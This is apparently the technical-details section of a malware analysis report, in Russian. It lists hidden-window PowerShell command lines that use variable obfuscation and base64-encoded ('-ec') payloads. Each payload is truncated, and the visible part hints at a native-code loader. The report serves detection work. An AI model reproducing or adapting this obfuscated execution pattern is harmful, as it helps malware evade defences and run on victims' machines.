Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /w 1 /C "sv oc -;sv in ec;sv ny ((gv oc).value.toString()+(gv in).value.toString());powershell (gv ny).value.toString() ('JABLAGsAPQAnACQASwBQAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACs...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /w 1 /C "sv oc -;sv in ec;sv ny ((gv oc).value.toString()+(gv in).value.toString());powershell (gv ny).value.toString() ('JABLAGsAPQAnACQASwBQAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACs...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JABLAGsAPQAnACQASwBQAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByA...